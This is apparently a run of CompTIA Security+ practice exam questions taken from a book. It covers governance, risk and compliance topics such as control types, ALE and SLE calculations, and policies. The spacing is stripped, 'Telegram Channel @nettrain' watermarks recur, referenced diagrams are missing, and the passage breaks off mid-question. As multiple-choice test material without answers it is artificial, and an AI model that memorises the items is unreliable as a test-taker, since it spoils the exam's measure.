139. AaronwantstouseamultiplatformloggingtoolthatsupportsbothWindowsandUnix/Linuxsystemsandmanylogformats.Whichofthefollowingtoolsshouldheusetoensurethathisloggingenvironmentcanacceptandprocesstheselogs?
A. IPFIX
B. NXLog
C. syslog
D. journalctl
140. Whichofthefollowingisnotacommontypeofincidentresponseexercise?
A. Drills
B. Simulations
C. Tabletop
D. Walk-throughs
141. Susanneedstorunaportscanofanetwork.Whichofthefollowingtoolswouldnotallowhertoperformthattypeofscan?
A. netstat
Telegram Channel @nettrain
B. netcat
C. nmap
D. Nessus
142. WhattermbelongsatpointAontheDiamondModelofIntrusionAnalysisshownbelow?
A. Opponent
B. Target
C. Adversary
D. System
143. ThegovernmentagencythatVincentworksforhasreceivedaFreedomofInformationAct(FoIA)requestandneedstoprovidetherequestedinformationfromitsemailservers.Whatisthisprocesscalled?
Telegram Channel @nettrain
Chapter5Governance,Risk,andCompliance
THECOMPTIASECURITY+EXAMSY0-601TOPICSCOVEREDINTHISCHAPTERINCLUDETHEFOLLOWING:
5.1Compareandcontrastvarioustypesofcontrols
5.2Explaintheimportanceofapplicableregulations,standards,orframeworksthatimpactorganizationalsecurityposture
5.3Explaintheimportanceofpoliciestoorganizationalsecurity
5.4Summarizeriskmanagementprocessesandconcepts
5.5Explainprivacyandsensitivedataconceptsinrelationtosecurity
1. Carolinehasbeenaskedtofindaninternationalstandardtoguidehercompany'schoicesinimplementinginformationsecuritymanagementsystems.Whichofthefollowingwouldbethebestchoiceforher?
A. ISO27002
B. ISO27017
C. NIST800-12
D. NIST800-14
2. Adamisconcernedaboutmalwareinfectingmachinesonhisnetwork.Oneofhisconcernsisthatmalwarewouldbeabletoaccesssensitivesystemfunctionalitythatrequiresadministrativeaccess.Whattechniquewouldbestaddressthisissue?
A. Implementinghost-basedantimalware
B. Usinganonadministrativeaccountfornormalactivities
C. Implementingfull-diskencryption(FDE)
D. Makingcertaintheoperatingsystemsarepatched
Telegram Channel @nettrain
3. Youareresponsibleforsettingupnewaccountsforyourcompanynetwork.Whatisthemostimportantthingtokeepinmindwhensettingupnewaccounts?
A. Passwordlength
B. Passwordcomplexity
C. Accountage
D. Leastprivileges
4. Whichofthefollowingprinciplesstipulatesthatmultiplechangestoacomputersystemshouldnotbemadeatthesametime?
A. Duediligence
B. Acceptableuse
C. Changemanagement
D. Duecare
5. Youareasecurityengineeranddiscoveredanemployeeusingthecompany'scomputersystemstooperatetheirsmallbusiness.Theemployeeinstalledtheirpersonalsoftwareonthecompany'scomputerandisusingthecomputerhardware,suchastheUSBport.Whatpolicywouldyourecommendthecompanyimplementtopreventanyriskofthecompany'sdataandnetworkbeingcompromised?
A. Acceptableusepolicy
B. Cleandeskpolicy
C. Mandatoryvacationpolicy
D. Jobrotationpolicy
6. Whatstandardisusedforcreditcardsecurity?
A. GDPR
B. COPPA
C. PCI-DSS
D. CIS
7. Youareasecuritymanagerforyourcompanyandneedtoreducetheriskofemployeesworkingincollusiontoembezzlefunds.Whichofthefollowing
Telegram Channel @nettrain
policieswouldyouimplement?
A. Mandatoryvacations
B. Cleandesk
C. NDA
D. Continuingeducation
8. Afteryourcompanyimplementedacleandeskpolicy,youhavebeenaskedtosecurephysicaldocumentseverynight.Whichofthefollowingwouldbethebestsolution?
A. Departmentdoorlock
B. Lockingcabinetsanddrawersateachdesk
C. Proximitycards
D. Onboarding
9. Whichofthefollowingtechniquesattemptstopredictthelikelihoodathreatwilloccurandassignsmonetaryvaluesshouldalossoccur?
A. Changemanagement
B. Vulnerabilityassessment
C. Qualitativeriskassessment
D. Quantitativeriskassessment
10. Whichofthefollowingagreementsislessformalthanatraditionalcontractbutstillhasacertainlevelofimportancetoallpartiesinvolved?
A. SLA
B. BPA
C. ISA
D. MOU
11. Aspartoftheresponsetoacreditcardbreach,Sallydiscoversevidencethatindividualsinherorganizationwereactivelyworkingtostealcreditcardinformationandpersonallyidentifiableinformation(PII).Shecallsthepolicetoengagethemfortheinvestigation.Whathasshedone?
A. Escalatedtheinvestigation
Telegram Channel @nettrain
B. Publicnotification
C. Outsourcedtheinvestigation
D. Tokenizedthedata
12. Youhaveanassetthatisvaluedat$16,000,theexposurefactorofariskaffectingthatassetis35percent,andtheannualizedrateofoccurrenceis75percent.WhatistheSLE?
A. $5,600
B. $5,000
C. $4,200
D. $3,000
13. Duringameeting,youpresentmanagementwithalistofaccesscontrolsusedonyournetwork.Whichofthefollowingcontrolsisanexampleofacorrectivecontrol?
A. IDS
B. Auditlogs
C. Antivirussoftware
D. Router
14. Youarethenewsecurityadministratorandhavediscoveredyourcompanylacksdeterrentcontrols.Whichofthefollowingwouldyouinstallthatsatisfiesyourneeds?
A. Lighting
B. Motionsensor
C. Hiddenvideocameras
D. Antivirusscanner
15. Yourcompany'ssecuritypolicyincludessystemtestingandsecurityawarenesstrainingguidelines.Whichofthefollowingcontroltypesisthis?
A. Detectivetechnicalcontrol
B. Preventivetechnicalcontrol
C. Detectiveadministrativecontrol
Telegram Channel @nettrain
D. Preventiveadministrativecontrol
16. Youareasecurityadministratorforyourcompanyandyouidentifyasecurityrisk.Youdecidetocontinuewiththecurrentsecurityplan.However,youdevelopacontingencyplanincasethesecurityriskoccurs.Whichofthefollowingtypeofriskresponsetechniqueareyoudemonstrating?
A. Accept
B. Transfer
C. Avoid
D. Mitigate
17. Jim'scompanyoperatesfacilitiesinIllinois,Indiana,andOhio,buttheheadquartersisinIllinois.WhichstatelawsdoesJimneedtoreviewandhandleaspartofhissecurityprogram?
A. AllU.S.statelaws
B. Illinois
C. OnlyU.S.federallaws
D. StatelawsinIllinois,Indiana,andOhio
18. YouareanITadministratorforacompanyandyouareaddingnewemployeestoanorganization'sidentityandaccessmanagementsystem.Whichofthefollowingbestdescribestheprocessyouareperforming?
A. Onboarding
B. Offboarding
C. Adverseaction
D. Jobrotation
19. Markisanofficemanageratalocalbankbranch.Hewantstoensurethatcustomerinformationisn'tcompromisedwhenthedesksideemployeesareawayfromtheirdesksfortheday.WhatsecurityconceptwouldMarkusetomitigatethisconcern?
A. Cleandesk
B. Backgroundchecks
Telegram Channel @nettrain
C. Continuingeducation
D. Jobrotation
20. YouareasecurityadministratorandadvisethewebdevelopmentteamtoincludeaCAPTCHAonthewebpagewhereusersregisterforanaccount.Whichofthefollowingcontrolsisthisreferringto?
A. Deterrent
B. Detective
C. Compensating
D. Degaussing
21. Whichofthefollowingisnotacommonsecuritypolicytype?
A. Acceptableusepolicy
B. Socialmediapolicy
C. Passwordpolicy
D. Parkingpolicy
22. AstheITsecurityofficerforyourorganization,youareconfiguringdatalabeloptionsforyourcompany'sresearchanddevelopmentfileserver.Regularuserscanlabeldocumentsascontractor,public,orinternal.Whichlabelshouldbeassignedtocompanytradesecrets?
A. High
B. Topsecret
C. Proprietary
D. Low
23. Whichofthefollowingisnotaphysicalsecuritycontrol?
A. Motiondetector
B. Fence
C. Antivirussoftware
D. Closed-circuittelevision(CCTV)
24. Yoursecuritymanagerwantstodecidewhichriskstomitigatebasedoncost.Whatisthisanexampleof?
Telegram Channel @nettrain
A. Quantitativeriskassessment
B. Qualitativeriskassessment
C. Businessimpactanalysis
D. Threatassessment
25. YourcompanyhasoutsourceditsproprietaryprocessestoAcmeCorporation.Duetotechnicalissues,Acmewantstoincludeathird-partyvendortohelpresolvethetechnicalissues.WhichofthefollowingmustAcmeconsiderbeforesendingdatatothethirdparty?
A. Thisdatashouldbeencryptedbeforeitissenttothethird-partyvendor.
B. Thismayconstituteunauthorizeddatasharing.
C. Thismayviolatetheprivilegeduserrole-basedawarenesstraining.
D. Thismayviolateanondisclosureagreement.
26. Whichofthefollowingisconsideredadetectivecontrol?
A. Closed-circuittelevision(CCTV)
B. Anacceptableusepolicy
C. Firewall
D. IPS
27. WhichofthefollowingistypicallyincludedinaBPA?
A. Clearstatementsdetailingtheexpectationbetweenacustomerandaserviceprovider
B. Theagreementthataspecificfunctionorservicewillbedeliveredattheagreed-onlevelofperformance
C. Sharingofprofitsandlossesandtheadditionorremovalofapartner
D. SecurityrequirementsassociatedwithinterconnectingITsystems
28. Youarethenetworkadministratorofyourcompany,andthemanagerofaretailsitelocatedacrosstownhascomplainedaboutthelossofpowertotheirbuildingseveraltimesthisyear.Thebranchmanagerisaskingforacompensatingcontroltoovercomethepoweroutage.Whatcompensatingcontrolwouldyourecommend?
Telegram Channel @nettrain
A. Firewall
B. Securityguard
C. IDS
D. Backupgenerator
29. Jamesisasecurityadministratorandisattemptingtoblockunauthorizedaccesstothedesktopcomputerswithinthecompany'snetwork.Hehasconfiguredthecomputers’operatingsystemstolockafter5minutesofnoactivity.WhattypeofsecuritycontrolhasJamesimplemented?
A. Preventive
B. Corrective
C. Deterrent
D. Detective
30. Anaccountingemployeechangesroleswithanotheraccountingemployeeevery4months.Whatisthisanexampleof?
A. Separationofduties
B. Mandatoryvacation
C. Jobrotation
D. Onboarding
31. Tony'scompanywantstolimittheirriskduetocustomerdata.Whatpracticeshouldtheyputinplacetoensurethattheyhaveonlythedataneededfortheirbusinesspurposes?
A. Datamasking
B. Dataminimization
C. Tokenization
D. Anonymization
32. YourcompanywebsiteishostedbyanInternetserviceprovider.Whichofthefollowingriskresponsetechniquesisinuse?
A. Riskavoidance
B. Riskregister
Telegram Channel @nettrain
C. Riskacceptance
D. Riskmitigation
33. Asecurityadministratorisreviewingthecompany'scontinuityplan,anditspecifiesanRTOoffourhoursandanRPOofoneday.Whichofthefollowingistheplandescribing?
A. Systemsshouldberestoredwithinonedayandshouldremainoperationalforatleastfourhours.
B. Systemsshouldberestoredwithinfourhoursandnolaterthanonedayaftertheincident.
C. Systemsshouldberestoredwithinonedayandlose,atmost,fourhours’worthofdata.
D. Systemsshouldberestoredwithinfourhourswithalossofoneday'sworthofdataatmost.
34. Whichofthefollowingstatementsistrueregardingadataretentionpolicy?
A. Regulationsrequirefinancialtransactionstobestoredforsevenyears.
B. Employeesmustremoveandlockupallsensitiveandconfidentialdocumentswhennotinuse.
C. Itdescribesaformalprocessofmanagingconfigurationchangesmadetoanetwork.
D. Itisalegaldocumentthatdescribesamutualagreementbetweenparties.
35. Howdoyoucalculatetheannuallossexpectancy(ALE)thatmayoccurduetoathreat?
A. Exposurefactor(EF)/singlelossexpectancy(SLE)
B. Singlelossexpectancy(SLE)×annualrateofoccurrence(ARO)
C. Assetvalue(AV)×exposurefactor(EF)
D. Singlelossexpectancy(SLE)/exposurefactor(EF)
36. MichellehasbeenaskedtousetheCISbenchmarkforWindows10aspartofhersystemsecurityprocess.Whatinformationwillshebeusing?
A. InformationonhowsecureWindows10isinitsdefaultstate
Telegram Channel @nettrain
B. AsetofrecommendedsecurityconfigurationstosecureWindows10
C. PerformancebenchmarktoolsforWindows10systems,includingnetworkspeedandfirewallthroughput
D. VulnerabilityscandataforWindows10systemsprovidedbyvariousmanufacturers
37. Whichofthefollowingisthebestexampleofapreventivecontrol?
A. Databackups
B. Securitycamera
C. Dooralarm
D. Smokedetectors
38. Youareasecurityadministratorforyourcompanyandyouidentifyasecurityriskthatyoudonothavein-houseskillstoaddress.Youdecidetoacquirecontractresources.Thecontractorwillberesponsibleforhandlingandmanagingthissecurityrisk.Whichofthefollowingtypeofriskresponsetechniquesareyoudemonstrating?
A. Accept
B. Mitigate
C. Transfer
D. Avoid
39. Eachsalespersonwhotravelshasacablelocktolockdowntheirlaptopwhentheystepawayfromthedevice.Towhichofthefollowingcontrolsdoesthisapply?
A. Administrative
B. Compensating
C. Deterrent
D. Preventive
40. Youareaserveradministratorforyourcompany'sprivatecloud.Toprovideservicetoemployees,youareinstructedtousereliableharddisksintheservertohostavirtualenvironment.Whichofthefollowingbestdescribesthereliabilityofharddrives?
Telegram Channel @nettrain
A. MTTR
B. RPO
C. MTBF
D. ALE
41. Allofyourorganization'strafficflowsthroughasingleconnectiontotheInternet.Whichofthefollowingtermsbestdescribesthisscenario?
A. Cloudcomputing
B. Loadbalancing
C. Singlepointoffailure
D. Virtualization
42. Whichofthefollowingbestdescribesthedisadvantagesofquantitativeriskanalysiscomparedtoqualitativeriskanalysis?
A. Quantitativeriskanalysisrequiresdetailedfinancialdata.
B. Quantitativeriskanalysisissometimessubjective.
C. Quantitativeriskanalysisrequiresexpertiseonsystemsandinfrastructure.
D. Quantitativeriskprovidesclearanswerstorisk-basedquestions.
43. LeighAnnisthenewnetworkadministratorforalocalcommunitybank.Shestudiesthecurrentfileserverfolderstructuresandpermissions.Thepreviousadministratordidn'tproperlysecurecustomerdocumentsinthefolders.LeighAnnassignsappropriatefileandfolderpermissionstobesurethatonlytheauthorizedemployeescanaccessthedata.WhatsecurityroleisLeighAnnassuming?
A. Poweruser
B. Dataowner
C. User
D. Custodian
44. Categorizingresidualriskismostimportanttowhichofthefollowingriskresponsetechniques?
A. Riskmitigation
Telegram Channel @nettrain
B. Riskacceptance
C. Riskavoidance
D. Risktransfer
45. YouaretheITmanagerandoneofyouremployeesaskswhoassignsdatalabels.Whichofthefollowingassignsdatalabels?
A. Owner
B. Custodian
C. Privacyofficer
D. Systemadministrator
46. Whichofthefollowingisthemostpressingsecurityconcernrelatedtosocialmedianetworks?
A. OtheruserscanviewyourMACaddress.
B. OtheruserscanviewyourIPaddress.
C. Employeescanleakacompany'sconfidentialinformation.
D. Employeescanexpresstheiropinionabouttheircompany.
47. Whatconceptisbeingusedwhenuseraccountsarecreatedbyoneemployeeanduserpermissionsareconfiguredbyanotheremployee?
A. Backgroundchecks
B. Jobrotation
C. Separationofduties
D. Collusion
48. Asecurityanalystisanalyzingthecostthecompanycouldincurifthecustomerdatabasewasbreached.Thedatabasecontains2,500recordswithpersonallyidentifiableinformation(PII).Studiesshowthecostperrecordwouldbe$300.Thelikelihoodthatthedatabasewouldbebreachedinthenextyearisonly5percent.WhichofthefollowingwouldbetheALEforasecuritybreach?
A. $15,000
B. $37,500
C. $150,000
Telegram Channel @nettrain
D. $750,000
49. Whichofthefollowingconceptsdefinesacompanygoalforsystemrestorationandacceptabledataloss?
A. MTBF
B. MTTR
C. RPO
D. ARO
50. Yourcompanyhiresathird-partyauditortoanalyzethecompany'sdatabackupandlong-termarchivingpolicy.Whichtypeoforganizationdocumentshouldyouprovidetotheauditor?
A. Cleandeskpolicy
B. Acceptableusepolicy
C. Securitypolicy
D. Dataretentionpolicy
51. Youareanetworkadministratorandhavebeengiventhedutyofcreatinguseraccountsfornewemployeesthecompanyhashired.Theseemployeesareaddedtotheidentityandaccessmanagementsystemandassignedmobiledevices.Whatprocessareyouperforming?
A. Offboarding
B. Systemowner
C. Onboarding
D. Executiveuser
52. Whattypeofcontrolisseparationofduty?
A. Physical
B. Operational
C. Technical
D. Compensating
53. WhichofthefollowingrightsisnotincludedintheGDPR?
A. Therighttoaccess
Telegram Channel @nettrain
B. Therighttobeforgotten
C. Therighttodataportability
D. Therighttoanonymity
54. NickisfollowingtheNationalInstituteofStandardsandTechnology(NIST)RiskManagementFramework(RMF)andhascompletedtheprepareandcategorizesteps.Whichstepintheriskmanagementframeworkisnext?
A. Assessingcontrols
B. Implementingcontrols
C. Monitoringcontrols
D. Selectingcontrols
55. Whyarediversityoftrainingtechniquesanimportantconceptforsecurityprogramadministrators?
A. Itallowsformultiplefundingsources.
B. Eachpersonrespondstotrainingdifferently.
C. Itavoidsasinglepointoffailureintrainingcompliance.
D. ItisrequiredforcompliancewithPCI-DSS.
56. Alyssahasbeenaskedtocategorizetheriskofoutdatedsoftwareinherorganization.Whattypeofriskcategorizationshouldsheuse?
A. Internal
B. Quantitative
C. Qualitative
D. External
57. Whattermisusedtodescribealistingofallofanorganization'srisks,includinginformationabouttherisk'srating,howitisbeingremediated,remediationstatus,andwhoownsorisassignedresponsibilityfortherisk?
A. AnSSAE
B. Ariskregister
C. Arisktable
Telegram Channel @nettrain
D. ADSS
58. Whichofthefollowingtermsisusedtomeasurehowmaintainableasystemordeviceis?
A. MTBF
B. MTTF
C. MTTR
D. MITM
59. ThecompanythatOliviaworksforhasrecentlyexperiencedadatabreachthatexposedcustomerdata,includingtheirhomeaddresses,shoppinghabits,emailaddresses,andcontactinformation.Olivia'scompanyisanindustryleaderintheirspacebuthasstrongcompetitorsaswell.Whichofthefollowingimpactsisnotlikelytooccurnowthattheorganizationhascompletedtheirincidentresponseprocess?
A. Identitytheft
B. Financialloss
C. Reputationloss
D. Availabilityloss
60. EricworksfortheU.S.governmentandneedstoclassifydata.WhichofthefollowingisnotacommonclassificationtypeforU.S.governmentdata?
A. TopSecret
B. Secret
C. Confidential
D. Civilian
61. Whichofthefollowingisnotacommonlocationforprivacypracticestoberecordedorcodified?
A. Aformalprivacynotice
B. Thesourcecodeforaproduct
C. Thetermsoftheorganization'sagreementwithcustomers
D. Noneoftheabove
62. Whatkeydifferenceseparatespseudonymizationandanonymization?
Telegram Channel @nettrain
A. Anonymizationusesencryption.
B. Pseudonymizationrequiresadditionaldatatoreidentifythedatasubject.
C. Anonymizationcanbereversedusingahash.
D. Pseudonymizationusesrandomizedtokens.
63. Whatpolicyclearlystatestheownershipofinformationcreatedorusedbyanorganization?
A. Adatagovernancepolicy
B. Aninformationsecuritypolicy
C. Anacceptableusepolicy
D. Adataretentionpolicy
64. Helen'sorganizationprovidestelephonesupportfortheirentirecustomerbaseasacriticalbusinessfunction.Shehascreatedaplanthatwillensurethatherorganization'sVoiceoverIP(VoIP)phoneswillberestoredintheeventofadisaster.Whattypeofplanhasshecreated?
A. Adisasterrecoveryplan
B. AnRPOplan
C. Afunctionalrecoveryplan
D. AnMTBFplan
65. Greghasdatathatisclassifiedashealthinformationthathisorganizationusesaspartoftheircompany'sHRdata.Whichofthefollowingstatementsistrueforhiscompany'ssecuritypolicy?
A. Thehealthinformationmustbeencrypted.
B. Gregshouldreviewrelevantlawtoensurethehealthinformationishandledproperly.
C. Companiesareprohibitedfromstoringhealthinformationandmustoutsourcetothirdparties.
D. Alloftheabove
66. Whattypeofinformationdoesacontrolriskapplyto?
A. Healthinformation
Telegram Channel @nettrain
B. Personallyidentifiableinformation(PII)
C. Financialinformation
D. Intellectualproperty
67. WhattypeofimpactisanindividualmostlikelytoexperienceifadatabreachthatincludesPIIoccurs?
A. IPtheft
B. Reputationdamage
C. Fines
D. Identitytheft
68. Isaachasbeenaskedtowritehisorganization'ssecuritypolicies.Whatpolicyiscommonlyputinplaceforserviceaccounts?
A. Theymustbeissuedonlytosystemadministrators.
B. Theymustusemultifactorauthentication.
C. Theycannotuseinteractivelogins.
D. Alloftheabove
69. Ninaistaskedwithputtingradiofrequencyidentification(RFID)tagsoneverynewpieceofequipmentthatentersherdatacenterthatcostsmorethan$500.Whattypeoforganizationalpolicyismostlikelytoincludethistypeofrequirement?
A. Achangemanagementpolicy
B. Anincidentresponsepolicy
C. Anassetmanagementpolicy
D. Anacceptableusepolicy
70. Meganisreviewingherorganization'sdatacenternetworkdiagramasshowninthefollowingimage.WhatshouldshenoteforpointAonthediagram?
Telegram Channel @nettrain
A. Awirelesslink
B. Aredundantconnection
C. Awiredlink
D. Asinglepointoffailure
71. Emmaisreviewingthird-partyriskstoherorganization,andNate,herorganization'sprocurementofficer,notesthatpurchasesofsomelaptopsfromthecompany'shardwarevendorhavebeendelayedduetolackofavailabilityofSSDs(solidstatedrives)andspecificCPUsforspecificconfigurations.WhattypeofriskshouldEmmadescribethisas?
A. Financialrisk
B. Alackofvendorsupport
Telegram Channel @nettrain
C. Systemintegration
D. Supplychain
72. Henryhasimplementedanintrusiondetectionsystem.WhatcategoryandcontroltypecouldhelistforanIDS?
A. Technical,Detective
B. Administrative,Preventative
C. Technical,Corrective
D. Administrative,Detective
73. AmandaadministersWindows10workstationsforhercompanyandwantstouseasecureconfigurationguidefromatrustedsource.WhichofthefollowingisnotacommonsourceforWindows10securitybenchmarks?
A. CIS
B. Microsoft
C. TheFTC
D. TheNSA
74. KatiehasdiscoveredaWindows2008webserverrunninginherenvironment.Whatsecurityconcernshouldshelistforthissystem?
A. Windows2008onlyrunson32-bitplatforms.
B. Windows2008cannotrunmodernwebserversoftware.
C. Windows2008hasreacheditsendoflifeandcannotbepatched.
D. Alloftheabove
75. Patchingsystemsimmediatelyafterpatchesarereleasedisanexampleofwhatriskmanagementstrategy?
A. Acceptance
B. Avoidance
C. Mitigation
D. Transference
76. Charleswantstodisplayinformationfromhisorganization'sriskregisterinaneasy-to-understandand-rankformat.Whatcommontoolisusedtohelp
Telegram Channel @nettrain
managementquicklyunderstandrelativerankingsofrisk?
A. Riskplots
B. Aheatmap
C. Aqualitativeriskassessment
D. Aquantitativeriskassessment
77. Whatkeyelementofregulations,liketheEuropeanUnion's(EU's)GDPR,driveorganizationstoincludethemintheiroverallassessmentofriskposture?
A. Potentialfines
B. Theirannuallossexpectancy(ALE)
C. Theirrecoverytimeobjective(RTO)
D. Thelikelihoodofoccurrence
78. Whatphasesofhandlingadisasterarecoveredbyadisasterrecoveryplan?
A. Whattodobeforethedisaster
B. Whattododuringthedisaster
C. Whattodoafterthedisaster
D. Alloftheabove
79. Naomi'sorganizationhasrecentlyexperiencedabreachofcreditcardinformation.Afterinvestigation,itisdiscoveredthatherorganizationwasinadvertentlynotfullycompliantwithPCI-DSSandisnotcurrentlyfullycompliant.Whichofthefollowingpenaltiesisherorganizationmostlikelytoincur?
A. Criminalcharges
B. Fines
C. Terminationofthecreditcardprocessingagreement
D. Alloftheabove
80. AlainawantstomapacommonsetofcontrolsforcloudservicesbetweenstandardslikeCOBIT(ControlObjectivesforInformationandRelatedTechnology),FedRAMP(FederalRiskandAuthorizationManagementProgram),HIPAA(theHealthInsurancePortabilityandAccountabilityAct
Telegram Channel @nettrain
of1996),andothers.Whatcansheusetospeedupthatprocess?
A. TheCSA'sreferencearchitecture
B. ISO27001
C. TheCSA'scloudcontrolmatrix
D. ISO27002
81. Garyhascreatedanapplicationthatnewstaffinhisorganizationareaskedtouseaspartoftheirtraining.Theapplicationshowsthemexamplesofphishingemailsandasksthestaffmemberstoidentifytheemailsthataresuspiciousandwhy.Correctanswersreceivepoints,andincorrectanswerssubtractpoints.Whattypeofusertrainingtechniqueisthis?
A. Capturetheflag
B. Gamification
C. Phishingcampaigns
D. Role-basedtraining
82. WhatlaworregulationrequiresaDPOinorganizations?
A. FISMA
B. COPPA
C. PCI-DSS
D. GDPR
83. TheuniversitythatSusanworksforconductstopsecretresearchfortheU.S.DepartmentofDefenseaspartofapartnershipwithitsengineeringschool.Arecentlydiscoveredbreachpointstotheschoolbeingcompromisedforoverayearbyanadvancedpersistentthreatactor.WhatconsequenceofthebreachshouldSusanbemostconcernedabout?
A. Costtorestoreoperations
B. Fines
C. Identitytheft
D. IPtheft
84. Whattermisusedtodescribethefunctionsthatneedtobecontinuedthroughoutorresumedasquicklyaspossibleafteradisaster?
Telegram Channel @nettrain
A. Singlepointsoffailure
B. Mission-essentialfunctions
C. Recoverytimeobjectives
D. Corerecoveryfunctions
85. Yourcompanyisconsideringmovingitsmailservertoahostingcompany.Thiswillhelpreducehardwareandserveradministratorcostsatthelocalsite.Whichofthefollowingdocumentswouldformallystatethereliabilityandrecourseifthereliabilityisnotmet?
A. MOU
B. SLA
C. ISA
D. BPA
86. Rick'sorganizationprovidesawebsitethatallowsuserstocreateanaccountandthenuploadtheirarttosharewithotherusers.Heisconcernedaboutabreachandwantstoproperlyclassifythedatafortheirhandlingprocess.WhatdatatypeismostappropriateforRicktolabelthedatahisorganizationcollectsandstores?
A. Customerdata
B. PII
C. Financialinformation
D. Healthinformation
87. Jackisconductingariskassessment,andastaffmembernotesthatthecompanyhasspecialized,internalAIalgorithmsthatarepartofthecompany'smainproduct.WhatriskshouldJackidentifyasmostlikelytoimpactthosealgorithms?
A. External
B. Internal
C. IPtheft
D. Licensing
88. Danhaswrittenapolicythatprohibitsemployeesfromsharingtheir
Telegram Channel @nettrain
passwordswiththeircoworkers,familymembers,orothers.Whattypeofcredentialpolicyhashecreated?
A. Devicecredentialpolicy
B. Personnelcredentialpolicy
C. Aserviceaccountpolicy
D. Anadministrativeaccountpolicy
89. Riskseverityiscalculatedusingtheequationshownhere.WhatinformationshouldbesubstitutedforX?
Riskseverity=X*Impact
A. Inherentrisk
B. MTTR(meantimetorepair)
C. Likelihoodofoccurrence
D. RTO(recoverytimeobjective)
90. Howisassetvaluedetermined?
A. Theoriginalcostoftheitem
B. Thedepreciatedcostoftheitem
C. Thecosttoreplacetheitem
D. Anyoftheabovebasedonorganizationalpreference
91. Whatprocessisusedtohelpidentifycriticalsystems?
A. ABIA
B. AnMTBF
C. AnRTO
D. AnICD
92. Zarmeenawantstotransfertheriskforbreachestoanotherorganization.Whichofthefollowingoptionsshouldsheusetotransfertherisk?
A. Explaintohermanagementthatbreacheswilloccur.
B. Blamefuturebreachesoncompetitors.
C. Sellherorganization'sdatatoanotherorganization.
Telegram Channel @nettrain
D. Purchasecybersecurityinsurance.
93. Whichofthefollowingisacommonsecuritypolicyforserviceaccounts?
A. Limitingloginhours
B. Prohibitinginteractivelogins
C. Limitingloginlocations
D. Implementingfrequentpasswordexpiration
94. Thefinancialcostofabreachisanexampleofwhatcomponentofriskcalculations?
A. Probability
B. Riskseverity
C. Impact
D. Alloftheabove
95. Aspartofhisorganization'sefforttoidentifyanewheadquarterslocation,SeanreviewstheFederalEmergencyManagementAgency(FEMA)floodmapsforthepotentiallocationheisreviewing.Whatprocessrelatedtodisasterrecoveryplanningincludesactionslikethis?
A. Businessimpactanalysis(BIA)
B. Siteriskassessment
C. Crimepreventionthroughenvironmentaldesign
D. Businesscontinuityplanning
96. Joannawantstorequestanauditreportfromavendorsheisconsideringandplanstoreviewtheauditor'sopinionsontheeffectivenessofthesecurityandprivacycontrolsthevendorhasinplace.WhattypeofStandardforAttestationEngagements(SSAE)shouldsherequest?
A. SSAE-18SOC1,Type2
B. SSAE-18SOC2,Type1
C. SSAE-18SOC1,Type1
D. SSAE-18SOC2,Type2
97. Jasonhascreatedariskregisterforhisorganizationandregularlyupdatesitwithinputfrommanagersandseniorleadershipthroughoutthe
Telegram Channel @nettrain
organization.Whatpurposedoesthisserve?
A. Itdecreasesinherentrisk.
B. Itincreasesriskawareness.
C. Itdecreasesresidualrisk.
D. Itincreasesriskappetite.
98. Lauraisawarethatherstatehaslawsthatguideherorganizationintheeventofabreachofpersonallyidentifiableinformation,includingSocialSecuritynumbers(SSNs).IfshehasabreachthatinvolvesSSNs,whatactionisshelikelytohavetotakebasedonstatelaw?
A. DestroyallSocialSecuritynumbers.
B. Reclassifyallimpacteddata.
C. Providepublicnotificationofthebreach.
D. Provideadataminimizationplan.
99. Whichofthefollowingdoesnotminimizesecuritybreachescommittedbyinternalemployees?
A. Jobrotation
B. Separationofduties
C. Nondisclosureagreementssignedbyemployees
D. Mandatoryvacations
100. Olivia'scloudserviceproviderclaimstoprovide“fiveninesofuptime”andOlivia'scompanywantstotakeadvantageofthatservicebecausetheirwebsitelosesthousandsofdollarseveryhourthatitisdown.WhatbusinessagreementcanOlivaputinplacetohelpensurethatthereliabilitythatthevendoradvertisesismaintained?
A. AnMOU
B. AnSLA
C. AnMSA
D. ABPA
101. Afterreviewingsystemsonhisnetwork,BrianhasdiscoveredthatdozensofthemarerunningcopiesofaCADsoftwarepackagethatthecompany
Telegram Channel @nettrain
hasnotpaidfor.Whatrisktypeshouldheidentifythisas?
A. Internal
B. Legacysystems
C. IPtheft
D. Softwarecompliance
102. Garyisbeginninghisriskassessmentfortheorganizationandhasnotyetbeguntoimplementcontrols.Whatriskdoeshisorganizationface?
A. Residualrisk
B. IPtheftrisk
C. Multipartyrisk
D. Inherentrisk
103. HowisSLEcalculated?
A. AV*EF
B. RTO*AV
C. MTTR*EF
D. AV*ARO
104. Whattypeofcredentialpolicyistypicallycreatedtohandlecontractorsandconsultants?
A. Apersonnelpolicy
B. Aserviceaccountpolicy
C. Athird-partypolicy
D. Arootaccountpolicy
105. WaynehasestimatedtheAROforariskinhisorganizationtobe3.HowoftendoesWaynethinktheeventwillhappen?
A. Onceevery3months
B. Threetimesayear
C. Onceeverythreeyears
D. Onceayearforthreeyears
Telegram Channel @nettrain
106. Gurvinderisassessingrisksfromdisasterstohiscompany'sfacilityandwantstoproperlycategorizetheminhisplanning.Whichofthefollowingisnotatypeofnaturaldisaster?
A. Fire
B. Flood
C. Tornado
D. Industrialaccidents
107. Madhuriisclassifyingallofherorganization'sdataandwantstoproperlyclassifytheinformationonthemainorganizationalwebsitethatisavailabletoanyonewhovisitsthesite.Whatdataclassificationshouldsheusefromthefollowinglist?
A. Sensitive
B. Confidential
C. Public
D. Critical
108. Elleworksforacreditcardcompanythathandlescreditcardtransactionsforbusinessesaroundtheworld.Whatdataprivacyroledoeshercompanyplay?
A. Adatacontroller
B. Adatasteward
C. Adatacustodian
D. Adataprocessor
109. ThewebsitethatBrianisusingshowspartofhisSocialSecuritynumber,notallofit,andreplacingtherestofthedigitswithasterisks,allowinghimtoverifythelastfourdigits.Whattechniqueisinuseonthewebsite?
A. Tokenization
B. Hashing
C. Encryption
D. Datamasking
110. Mikewantstolookforacommonsetoftoolsforsecurityandrisk
Telegram Channel @nettrain
managementforhisinfrastructureasaservice(IaaS)environment.Whichofthefollowingorganizationsprovidesavendor-neutralreferencearchitecturethathecanusetovalidatehisdesign?
A. TheCenterforInternetSecurity(CIS)
B. ISO
C. TheCloudSecurityAlliance
D. NIST
111. Whattypeofcontrolisalock?
A. Managerial
B. Technical
C. Physical
D. Corrective
112. Isaachasdiscoveredthathisorganization'sfinancialaccountingsoftwareismisconfigured,causingincorrectdatatobereportedonanongoingbasis.Whattypeofriskisthis?
A. Inherentrisk
B. Residualrisk
C. Controlrisk
D. Transparentrisk
113. Whichofthefollowingisnotapotentialtypeofperson-madedisaster?
A. Fires
B. Oilspills
C. Hurricanes
